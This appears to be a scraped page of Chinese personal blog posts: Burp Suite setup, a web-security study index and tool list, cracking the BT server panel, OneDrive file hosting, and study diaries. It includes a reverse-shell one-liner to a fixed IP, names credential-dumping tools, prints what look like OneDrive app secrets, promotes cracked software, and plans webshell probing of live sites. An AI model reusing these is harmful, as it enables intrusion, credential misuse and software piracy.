Burpsuite安装和使用
Burp Suite是进行Web应用安全测试集成平台。它的各种工具无缝地工作在一起,以支持整个测试过程中,从最初的映射和应用程序的安全性分析,通过发现和利用安全漏洞。
一、安装burpsuite
burpsuite目前最新版是v1.7.36
,但是我们以安装破解版为准:百度网盘
破解方法:请参考最下安装文档,略过(先打开burp-loader-keygen.jar
)
二、基础使用
2.1 代理配置
请参考最下面的文档,略过。
2.2 证书安装
- 访问网站http://burp/, 点击右上按钮导出通用证书。安装的时候选择【受信任的根证书颁发机构】
- 导出google证书:
- 点击【Proxy】-【Options】 在【Proxy Listeners】下的 【Import/Export CA certificate】
- 选择【Export】 -》 【Certificate in DER format】;另存为
google.cer
- 在google浏览器配置中搜索ssl,导入到 【受信任的根证书颁发机构】中
三、高阶使用
参考文章
burpsuite实战文章
2018-11-16 Think of Fullstack
阅读了下Phodal’s Idea实战指南,非常佩服这种技术男工作和学习的点滴都记录下来。反观我这就比较乱了,确实需要整理一波,不然到后面自己都不想回来看这里的技术文章哈。
分析了下,我这边的知识体系分散而且乱,内容的结构比较差。内容实际可以参考ibm上面的一些技术文章,很可惜写类似这样的文件是相当耗时间的。退而求之,每周只写一篇高质量的文章,并且分享这些文章到主流的一些平台也是可以的,剩下的哪些技术文章就提提要点即可了。
主要是时间和知识框架,时间的话主要是每天分配多少时间合理以及坚持每天把这些实际的内容记录下来。
最后
不要将自己圈在一个领域,不要做井底之蛙。
弄php将近4年了,一直没有好好的取扩展其他语言,现在python/golang/javascript将是接下来几个月要好好学习的对象了。
在此,共勉。
安全研究
介绍
参考的索引:https://wangyihang.gitbooks.io/awesome-web-security/
- 常用工具
- 开源仓库
- 优秀文章
- 常见漏洞
- /etc/passwd
- 文件包含
- 文件上传
- SQL注入
- XSS
- SSRF
- CSRF
- 命令代码执行
- 敏感信息泄露
- 随机数安全
- 代码审计
- 常用工具
- 书籍
- 渗透测试
- CTF 搅屎
- 流量操控技术
- 主机发现
- 内网中间人
- 一句话木马
- 反弹 shell
bash -c ‘bash -i &>/dev/tcp/8.8.8.8/8888 0>1’
安全利器
综合工具
- BurpSuite
爆破
- cheetch
- patator
社会工程学工具
- ccupp
- cupp
子域名枚举工具
- subDomainBrute
密码搜集工
- LaZagne
- mimikatz_trunk
- wce
参考
cnxScan项目
cnxScan是一个开源的url采集器,有多种采集模式可选,timeline如下
- 2018年11月16日:项目构思
- 初期功能
- 通过scapy设定关键字,爬取百度的热门关键字,可以设定关键字深度及最大关键字数量
- 初期功能
宝塔面板安装配置记
一、宝塔安装和破解
1.1 宝塔6的安装和破解
暂时只支持centos 7+的系统
|
|
1.2 宝塔5.9 的安装和破解
可以支持大部分linux系统
5.9 破解1
会替换当前面板内容,注意使用
|
|
二、宝塔基础命令使用
|
|
修改面板端口,如要改成8881(centos 6 系统)
|
|
ss-panel安装配置教程系列(三) - SS服务端对接
|
|
参考
OneIndex搭建OneDrive个人文件服务
准备内容:
- 申请5T教育用的OneDrive空间
- 免费域名
- 免费服务器:
now部署
|
|
接下来要配置文件 ./now.json:
|
|
|
|
OneDrive应用
- 上https://apps.dev.microsoft.com/portal/register-app 申请应用key
2059123f-f815-4dd2-993f-5afbbad0935b
kflDEVL9515|+vorpYGF6#;
eirqnN6-+ipBNQALZ8524@+
2018-11-09 关于请教
早上注意力分散,先看了菲电信短信优惠码,有了弄全球电信多国语言版指导书和汇率离线参考的应用
接下来又看了离线线程控制扫描器的架构、开源cms的一些漏洞。总而言之太乱了思维,没法专一。那么在这里先收集好我的一些想法
- 各国电信优惠指导app
- 离线汇率换算app,联网时可看实时汇率
- 用队列架构扫描集群。。
- 漏洞feed全文输出工具开发
- 开发工具下载镜像站:构思
上面这些权当记录下来,可能已经有对应的工具了,而且时间/精力/能力有限,弄好目前的先把!
今日任务
- 熟悉安全渗透的流程和原理:使用phpmywind扫站点,并加以利用漏洞 、部署dvwa本地渗透环境
- 学习python基础,作脑图导航,避免忘记。工具使用xmind8进行
- 学习小马的制作,开始利用小马去探测线上的一些漏洞,归纳总结
- 学习英文,生活常用的英文& 技术相关的文章、特别是安全相关的专业英文词汇
过程
蒂法蒂法